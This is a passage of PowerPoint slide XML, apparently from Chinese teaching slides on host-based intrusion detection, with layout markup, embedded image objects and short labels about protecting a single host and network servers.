            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="组合 39"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8633" y="2713"/>
                <a:ext cx="1508" cy="1508"/>
                <a:chOff x="8633" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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0" name="组合 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2372" y="5868"/>
              <a:ext cx="5161" cy="1508"/>
              <a:chOff x="8633" y="2713"/>
              <a:chExt cx="5161" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10029" y="3080"/>
                <a:ext cx="3765"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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>主机系统检测</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="20" name="组合 19"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8633" y="2713"/>
                <a:ext cx="1508" cy="1508"/>
                <a:chOff x="8633" y="3854"/>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2" name="Rectangle 2"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9174"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sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形: 圆角 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2440" y="4859"/>
              <a:ext cx="5446" cy="2761"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C3E8F6">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13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572895" y="2255520"/>
            <a:ext cx="9360535" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用于保护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单台主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不受网络攻击行为的侵害，需要安装在被保护的主机上。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="153" name="组合 152"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5860918" y="3085465"/>
            <a:ext cx="4811868" cy="2634925"/>
            <a:chOff x="10358" y="5165"/>
            <a:chExt cx="7130" cy="3775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="组合 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="14740" y="5165"/>
              <a:ext cx="2748" cy="3775"/>
              <a:chOff x="8760" y="2453"/>
              <a:chExt cx="4863" cy="7629"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Rectangle 2"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9120" y="2453"/>
                <a:ext cx="4440" cy="7598"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="129026" name="Object 104"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="10080" y="7080"/>
              <a:ext cx="3110" cy="2468"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7350" r:id="rId5" imgW="3277870" imgH="2598420" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId5" imgW="3277870" imgH="2598420" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="129026" name="Object 104"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="10080" y="7080"/>
                            <a:ext cx="3110" cy="2468"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="129030" name="Object 106"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="10080" y="3600"/>
              <a:ext cx="3110" cy="2468"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7351" r:id="rId7" imgW="3277870" imgH="2598420" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId7" imgW="3277870" imgH="2598420" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="129030" name="Object 106"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="10080" y="3600"/>
                            <a:ext cx="3110" cy="2468"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129032" name="Line 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9960" y="5040"/>
                <a:ext cx="3" cy="4440"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129033" name="Line 10"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9960" y="9480"/>
                <a:ext cx="840" cy="3"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129034" name="Line 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9960" y="8400"/>
                <a:ext cx="840" cy="3"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129035" name="Line 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9960" y="6600"/>
                <a:ext cx="840" cy="3"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129036" name="Line 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9960" y="5040"/>
                <a:ext cx="840" cy="3"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129063" name="Text Box 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10560" y="2908"/>
                <a:ext cx="2943" cy="798"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>网络服务器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129066" name="Text Box 43"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10680" y="6240"/>
                <a:ext cx="2943" cy="798"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" anchor="t">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>网络服务器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="51" name="Object 126"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="8760" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7352" r:id="rId8" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId8" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="51" name="Object 126"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="8760" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="52" name="Object 127"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9240" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7353" r:id="rId10" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId10" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="52" name="Object 127"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9240" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="45" name="Object 130"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9720" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7354" r:id="rId11" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId11" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="45" name="Object 130"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9720" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="67" name="Object 131"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9720" y="7680"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7355" r:id="rId12" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId12" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="67" name="Object 131"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9720" y="7680"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="68" name="Object 132"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9720" y="8040"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7356" r:id="rId13" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId13" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="68" name="Object 132"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9720" y="8040"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="69" name="Object 133"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9720" y="8280"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7357" r:id="rId14" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId14" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="69" name="Object 133"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9720" y="8280"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="70" name="Object 134"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="9960" y="8280"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7358" r:id="rId15" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId15" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="70" name="Object 134"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9960" y="8280"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="71" name="Object 135"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="10440" y="8280"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7359" r:id="rId16" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId16" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="71" name="Object 135"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
